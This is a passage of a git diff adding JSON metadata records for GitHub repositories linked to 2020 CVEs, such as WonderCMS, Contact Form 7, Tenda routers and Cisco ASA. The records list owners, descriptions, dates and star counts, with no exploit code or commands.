"https:\/\/avatars.githubusercontent.com\/u\/42164898?v=4", + "html_url": "https:\/\/github.com\/the-girl-who-lived", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the-girl-who-lived\/CVE-2020-35262", + "description": "Cross Site Scripting (XSS) in Digisol DG-HR3400 Router", + "fork": false, + "created_at": "2021-01-05T19:32:31Z", + "updated_at": "2024-08-12T20:09:09Z", + "pushed_at": "2021-01-05T19:46:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35314.json b/2020/CVE-2020-35314.json new file mode 100644 index 0000000000..070362792e --- /dev/null +++ b/2020/CVE-2020-35314.json @@ -0,0 +1,64 @@ +[ + { + "id": 428884974, + "name": "wonderplugin", + "full_name": "ybdegit2020\/wonderplugin", + "owner": { + "login": "ybdegit2020", + "id": 60058102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60058102?v=4", + "html_url": "https:\/\/github.com\/ybdegit2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ybdegit2020\/wonderplugin", + "description": "cve-2020-35314,一个带phpcode的zip文件", + "fork": false, + "created_at": "2021-11-17T02:39:06Z", + "updated_at": "2021-11-17T03:30:57Z", + "pushed_at": "2021-11-17T03:30:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 543884853, + "name": "WonderCMS-CVE-2020-35314", + "full_name": "AkashLingayat\/WonderCMS-CVE-2020-35314", + "owner": { + "login": "AkashLingayat", + "id": 55032920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55032920?v=4", + "html_url": "https:\/\/github.com\/AkashLingayat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkashLingayat\/WonderCMS-CVE-2020-35314", + "description": "WonderCMS 3.1.3 - Authenticated Remote Code Execution", + "fork": false, + "created_at": "2022-10-01T04:14:20Z", + "updated_at": "2022-10-01T04:14:20Z", + "pushed_at": "2022-10-01T04:30:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35391.json b/2020/CVE-2020-35391.json new file mode 100644 index 0000000000..806f0f01ae --- /dev/null +++ b/2020/CVE-2020-35391.json @@ -0,0 +1,69 @@ +[ + { + "id": 597735999, + "name": "CVE-2020-35391-POC", + "full_name": "dumitory-dev\/CVE-2020-35391-POC", + "owner": { + "login": "dumitory-dev", + "id": 45358107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45358107?v=4", + "html_url": "https:\/\/github.com\/dumitory-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dumitory-dev\/CVE-2020-35391-POC", + "description": "Tenda N300 Authentication Bypass via Malformed HTTP Request Header", + "fork": false, + "created_at": "2023-02-05T13:42:55Z", + "updated_at": "2024-03-14T16:35:52Z", + "pushed_at": "2023-02-05T14:40:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611809594, + "name": "CVE-2020-35391", + "full_name": "H454NSec\/CVE-2020-35391", + "owner": { + "login": "H454NSec", + "id": 127287794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127287794?v=4", + "html_url": "https:\/\/github.com\/H454NSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H454NSec\/CVE-2020-35391", + "description": "Tenda f3 Malformed HTTP Request Header Processing Vulnerability.", + "fork": false, + "created_at": "2023-03-09T15:36:22Z", + "updated_at": "2024-05-22T16:20:34Z", + "pushed_at": "2023-03-10T15:42:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-35391", + "f3", + "tenda" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35476.json b/2020/CVE-2020-35476.json new file mode 100644 index 0000000000..87a38924a0 --- /dev/null +++ b/2020/CVE-2020-35476.json @@ -0,0 +1,33 @@ +[ + { + "id": 453592891, + "name": "CVE-2020-35476", + "full_name": "glowbase\/CVE-2020-35476", + "owner": { + "login": "glowbase", + "id": 45991010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45991010?v=4", + "html_url": "https:\/\/github.com\/glowbase", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glowbase\/CVE-2020-35476", + "description": "A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. ", + "fork": false, + "created_at": "2022-01-30T05:09:07Z", + "updated_at": "2022-08-05T13:36:09Z", + "pushed_at": "2022-08-06T13:47:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35488.json b/2020/CVE-2020-35488.json new file mode 100644 index 0000000000..026502852d --- /dev/null +++ b/2020/CVE-2020-35488.json @@ -0,0 +1,69 @@ +[ + { + "id": 321746763, + "name": "CVE-2020-35488", + "full_name": "GuillaumePetit84\/CVE-2020-35488", + "owner": { + "login": "GuillaumePetit84", + "id": 66068507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66068507?v=4", + "html_url": "https:\/\/github.com\/GuillaumePetit84", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuillaumePetit84\/CVE-2020-35488", + "description": null, + "fork": false, + "created_at": "2020-12-15T17:55:07Z", + "updated_at": "2022-04-01T03:31:42Z", + "pushed_at": "2021-01-09T16:20:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 416451757, + "name": "nxlog-ubuntu-githubactions", + "full_name": "githubfoam\/nxlog-ubuntu-githubactions", + "owner": { + "login": "githubfoam", + "id": 33146150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33146150?v=4", + "html_url": "https:\/\/github.com\/githubfoam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/githubfoam\/nxlog-ubuntu-githubactions", + "description": "nxlog ubuntu CVE-2020-35488", + "fork": false, + "created_at": "2021-10-12T18:25:17Z", + "updated_at": "2021-10-21T20:49:27Z", + "pushed_at": "2021-10-24T17:09:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "nxlog-ce", + "ubuntu1804", + "ubuntu2004" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35489.json b/2020/CVE-2020-35489.json new file mode 100644 index 0000000000..5db7514e3c --- /dev/null +++ b/2020/CVE-2020-35489.json @@ -0,0 +1,174 @@ +[ + { + "id": 324114493, + "name": "Check-WP-CVE-2020-35489", + "full_name": "dn9uy3n\/Check-WP-CVE-2020-35489", + "owner": { + "login": "dn9uy3n", + "id": 21336403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21336403?v=4", + "html_url": "https:\/\/github.com\/dn9uy3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dn9uy3n\/Check-WP-CVE-2020-35489", + "description": "The (WordPress) website test script can be exploited for Unlimited File Upload via CVE-2020-35489", + "fork": false, + "created_at": "2020-12-24T09:10:17Z", + "updated_at": "2024-11-04T07:17:19Z", + "pushed_at": "2024-03-26T14:10:09Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "contact-form-7", + "cve-2020-35489", + "unrestricted-file-upload", + "vulnerability-detection", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 14, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 360400196, + "name": "Check-WP-CVE-2020-35489", + "full_name": "X0UCYB3R\/Check-WP-CVE-2020-35489", + "owner": { + "login": "X0UCYB3R", + "id": 82994877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82994877?v=4", + "html_url": "https:\/\/github.com\/X0UCYB3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X0UCYB3R\/Check-WP-CVE-2020-35489", + "description": null, + "fork": false, + "created_at": "2021-04-22T05:17:16Z", + "updated_at": "2024-10-13T12:30:26Z", + "pushed_at": "2021-04-22T05:17:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647539288, + "name": "wp_CVE-2020-35489_checker", + "full_name": "reneoliveirajr\/wp_CVE-2020-35489_checker", + "owner": { + "login": "reneoliveirajr", + "id": 74079397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74079397?v=4", + "html_url": "https:\/\/github.com\/reneoliveirajr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reneoliveirajr\/wp_CVE-2020-35489_checker", + "description": "WordPress Sites Vulnerability Checker for CVE-2020-35489 - \"Educational Use Only\"", + "fork": false, + "created_at": "2023-05-31T02:12:26Z", + "updated_at": "2024-07-11T15:08:27Z", + "pushed_at": "2024-01-21T13:18:06Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": true, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-35489", + "python", + "wordpress" + ], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802844748, + "name": "CVE-2020-35489", + "full_name": "Cappricio-Securities\/CVE-2020-35489", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2020-35489", + "description": "WordPress Contact Form 7 - Unrestricted File Upload", + "fork": false, + "created_at": "2024-05-19T12:26:59Z", + "updated_at": "2024-09-14T01:22:08Z", + "pushed_at": "2024-06-24T07:57:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-35489", + "dos", + "vapt", + "wapt", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 892833607, + "name": "poc-CVE-2020-35489", + "full_name": "g1thubb002\/poc-CVE-2020-35489", + "owner": { + "login": "g1thubb002", + "id": 189405548, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/189405548?v=4", + "html_url": "https:\/\/github.com\/g1thubb002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g1thubb002\/poc-CVE-2020-35489", + "description": "poc-CVE-2020-35489", + "fork": false, + "created_at": "2024-11-22T21:42:32Z", + "updated_at": "2024-11-22T21:43:40Z", + "pushed_at": "2024-11-22T21:43:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35498.json b/2020/CVE-2020-35498.json new file mode 100644 index 0000000000..ed2a820037 --- /dev/null +++ b/2020/CVE-2020-35498.json @@ -0,0 +1,33 @@ +[ + { + "id": 338203663, + "name": "cve-2020-35498-flag", + "full_name": "freddierice\/cve-2020-35498-flag", + "owner": { + "login": "freddierice", + "id": 2191702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2191702?v=4", + "html_url": "https:\/\/github.com\/freddierice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freddierice\/cve-2020-35498-flag", + "description": "Flag the cve-2020-35498 attack", + "fork": false, + "created_at": "2021-02-12T02:08:01Z", + "updated_at": "2021-02-12T19:38:47Z", + "pushed_at": "2021-02-12T17:53:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35545.json b/2020/CVE-2020-35545.json new file mode 100644 index 0000000000..f80ed0ab4b --- /dev/null +++ b/2020/CVE-2020-35545.json @@ -0,0 +1,33 @@ +[ + { + "id": 389169410, + "name": "CVE-2020-35545", + "full_name": "bousalman\/CVE-2020-35545", + "owner": { + "login": "bousalman", + "id": 16021440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16021440?v=4", + "html_url": "https:\/\/github.com\/bousalman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bousalman\/CVE-2020-35545", + "description": "Spotweb 1.4.9 - 'search' SQL Injection", + "fork": false, + "created_at": "2021-07-24T18:12:35Z", + "updated_at": "2021-07-24T18:13:12Z", + "pushed_at": "2021-07-24T18:13:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35575.json b/2020/CVE-2020-35575.json new file mode 100644 index 0000000000..da9022ebbc --- /dev/null +++ b/2020/CVE-2020-35575.json @@ -0,0 +1,33 @@ +[ + { + "id": 874901335, + "name": "CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure", + "full_name": "dylvie\/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure", + "owner": { + "login": "dylvie", + "id": 78607002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78607002?v=4", + "html_url": "https:\/\/github.com\/dylvie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dylvie\/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure", + "description": "password-disclosure issue in the web interface on certain TP-Link devices", + "fork": false, + "created_at": "2024-10-18T17:08:54Z", + "updated_at": "2024-10-20T14:09:27Z", + "pushed_at": "2024-10-18T17:14:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35590.json b/2020/CVE-2020-35590.json new file mode 100644 index 0000000000..10ef51801b --- /dev/null +++ b/2020/CVE-2020-35590.json @@ -0,0 +1,33 @@ +[ + { + "id": 324019820, + "name": "CVE-2020-35590", + "full_name": "N4nj0\/CVE-2020-35590", + "owner": { + "login": "N4nj0", + "id": 76006964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76006964?v=4", + "html_url": "https:\/\/github.com\/N4nj0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N4nj0\/CVE-2020-35590", + "description": "Brute-force tool for WordPress Plugin Limit Login Attempts Reloaded >=2.13.0 - Login Limit Bypass (CVE-2020-35590)", + "fork": false, + "created_at": "2020-12-23T23:11:34Z", + "updated_at": "2022-01-06T17:11:10Z", + "pushed_at": "2020-12-23T23:27:21Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35606.json b/2020/CVE-2020-35606.json new file mode 100644 index 0000000000..927f22667d --- /dev/null +++ b/2020/CVE-2020-35606.json @@ -0,0 +1,33 @@ +[ + { + "id": 323973616, + "name": "webminscan", + "full_name": "anasbousselham\/webminscan", + "owner": { + "login": "anasbousselham", + "id": 9357948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9357948?v=4", + "html_url": "https:\/\/github.com\/anasbousselham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anasbousselham\/webminscan", + "description": "Webmin Exploit Scanner CVE-2020-35606 CVE-2019-12840", + "fork": false, + "created_at": "2020-12-23T18:22:36Z", + "updated_at": "2020-12-23T18:23:02Z", + "pushed_at": "2020-12-23T18:22:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35669.json b/2020/CVE-2020-35669.json new file mode 100644 index 0000000000..d280774ac9 --- /dev/null +++ b/2020/CVE-2020-35669.json @@ -0,0 +1,33 @@ +[ + { + "id": 323609100, + "name": "CVE-2020-35669", + "full_name": "n0npax\/CVE-2020-35669", + "owner": { + "login": "n0npax", + "id": 10343861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10343861?v=4", + "html_url": "https:\/\/github.com\/n0npax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0npax\/CVE-2020-35669", + "description": null, + "fork": false, + "created_at": "2020-12-22T11:39:48Z", + "updated_at": "2022-08-26T03:49:57Z", + "pushed_at": "2021-01-01T11:01:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35682.json b/2020/CVE-2020-35682.json new file mode 100644 index 0000000000..a8f43c9d37 --- /dev/null +++ b/2020/CVE-2020-35682.json @@ -0,0 +1,33 @@ +[ + { + "id": 344470743, + "name": "CVE-2020-35682", + "full_name": "its-arun\/CVE-2020-35682", + "owner": { + "login": "its-arun", + "id": 20841421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20841421?v=4", + "html_url": "https:\/\/github.com\/its-arun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/its-arun\/CVE-2020-35682", + "description": "SD-91948: CVE-2020-35682: Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus.", + "fork": false, + "created_at": "2021-03-04T12:43:01Z", + "updated_at": "2024-08-12T20:10:54Z", + "pushed_at": "2021-03-04T12:47:46Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35713.json b/2020/CVE-2020-35713.json new file mode 100644 index 0000000000..db4c16fc85 --- /dev/null +++ b/2020/CVE-2020-35713.json @@ -0,0 +1,36 @@ +[ + { + "id": 331538426, + "name": "CVE-2020-35713", + "full_name": "Al1ex\/CVE-2020-35713", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-35713", + "description": "CVE-2020-35713", + "fork": false, + "created_at": "2021-01-21T06:39:58Z", + "updated_at": "2024-08-12T20:09:37Z", + "pushed_at": "2021-01-21T06:40:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "belkin", + "cve-2020-35713" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35717.json b/2020/CVE-2020-35717.json new file mode 100644 index 0000000000..e880f03a54 --- /dev/null +++ b/2020/CVE-2020-35717.json @@ -0,0 +1,64 @@ +[ + { + "id": 325946157, + "name": "cve-2020-35717", + "full_name": "hmartos\/cve-2020-35717", + "owner": { + "login": "hmartos", + "id": 13253656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13253656?v=4", + "html_url": "https:\/\/github.com\/hmartos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hmartos\/cve-2020-35717", + "description": "Showcase repository for CVE-2020-35717", + "fork": false, + "created_at": "2021-01-01T08:53:53Z", + "updated_at": "2023-03-09T00:13:18Z", + "pushed_at": "2021-01-01T08:54:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821333942, + "name": "Hacking-Electron-Apps-CVE-2020-35717-", + "full_name": "Redfox-Secuirty\/Hacking-Electron-Apps-CVE-2020-35717-", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Hacking-Electron-Apps-CVE-2020-35717-", + "description": null, + "fork": false, + "created_at": "2024-06-28T10:00:00Z", + "updated_at": "2024-06-28T10:00:03Z", + "pushed_at": "2024-06-28T10:00:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35728.json b/2020/CVE-2020-35728.json new file mode 100644 index 0000000000..bc3fe11b9a --- /dev/null +++ b/2020/CVE-2020-35728.json @@ -0,0 +1,37 @@ +[ + { + "id": 325689178, + "name": "CVE-2020-35728", + "full_name": "Al1ex\/CVE-2020-35728", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-35728", + "description": " CVE-2020-35728 & Jackson-databind RCE", + "fork": false, + "created_at": "2020-12-31T01:55:39Z", + "updated_at": "2024-08-12T20:09:00Z", + "pushed_at": "2020-12-31T01:56:18Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-35728", + "jackson-databind", + "rce" + ], + "visibility": "public", + "forks": 7, + "watchers": 41, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35729.json b/2020/CVE-2020-35729.json new file mode 100644 index 0000000000..4f0b23ff81 --- /dev/null +++ b/2020/CVE-2020-35729.json @@ -0,0 +1,37 @@ +[ + { + "id": 356187039, + "name": "CVE-2020-35729", + "full_name": "Al1ex\/CVE-2020-35729", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-35729", + "description": "CVE-2020-35729", + "fork": false, + "created_at": "2021-04-09T07:59:43Z", + "updated_at": "2024-08-12T20:12:00Z", + "pushed_at": "2021-04-09T08:00:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-35729", + "exploit", + "klogserver" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35749.json b/2020/CVE-2020-35749.json new file mode 100644 index 0000000000..f78d16d6fb --- /dev/null +++ b/2020/CVE-2020-35749.json @@ -0,0 +1,33 @@ +[ + { + "id": 456180379, + "name": "Wordpress-CVE-2020-35749", + "full_name": "M4xSec\/Wordpress-CVE-2020-35749", + "owner": { + "login": "M4xSec", + "id": 57313495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57313495?v=4", + "html_url": "https:\/\/github.com\/M4xSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4xSec\/Wordpress-CVE-2020-35749", + "description": "Wordpress Plugin Simple Job Board 2.9.3 LFI Vulnerability (CVE-2020-35749) proof of concept exploit ", + "fork": false, + "created_at": "2022-02-06T14:52:22Z", + "updated_at": "2024-08-12T20:20:23Z", + "pushed_at": "2022-02-07T10:54:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3580.json b/2020/CVE-2020-3580.json new file mode 100644 index 0000000000..e055e9a0ce --- /dev/null +++ b/2020/CVE-2020-3580.json @@ -0,0 +1,133 @@ +[ + { + "id": 380125389, + "name": "CVE-2020-3580", + "full_name": "Hudi233\/CVE-2020-3580", + "owner": { + "login": "Hudi233", + "id": 20939673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20939673?v=4", + "html_url": "https:\/\/github.com\/Hudi233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hudi233\/CVE-2020-3580", + "description": null, + "fork": false, + "created_at": "2021-06-25T04:39:30Z", + "updated_at": "2024-08-12T20:14:14Z", + "pushed_at": "2021-06-25T10:42:03Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 380934342, + "name": "CVE-2020-3580", + "full_name": "adarshvs\/CVE-2020-3580", + "owner": { + "login": "adarshvs", + "id": 24226460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24226460?v=4", + "html_url": "https:\/\/github.com\/adarshvs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adarshvs\/CVE-2020-3580", + "description": "Automated bulk IP or domain scanner for CVE 2020 3580. Cisco ASA and FTD XSS hunter.", + "fork": false, + "created_at": "2021-06-28T06:51:26Z", + "updated_at": "2024-11-26T06:20:17Z", + "pushed_at": "2021-07-10T12:42:24Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "cve-2020-3580", + "cve-2020-3580-exploit", + "scanner", + "xsshunter" + ], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 506850561, + "name": "CVE-2020-3580", + "full_name": "cruxN3T\/CVE-2020-3580", + "owner": { + "login": "cruxN3T", + "id": 45500586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45500586?v=4", + "html_url": "https:\/\/github.com\/cruxN3T", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cruxN3T\/CVE-2020-3580", + "description": "Cisco ASA XSS CVE-2020-3580", + "fork": false, + "created_at": "2022-06-24T02:16:05Z", + "updated_at": "2022-06-24T02:22:22Z", + "pushed_at": "2022-06-24T02:22:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514082380, + "name": "CVE-2020-3580", + "full_name": "catatonicprime\/CVE-2020-3580", + "owner": { + "login": 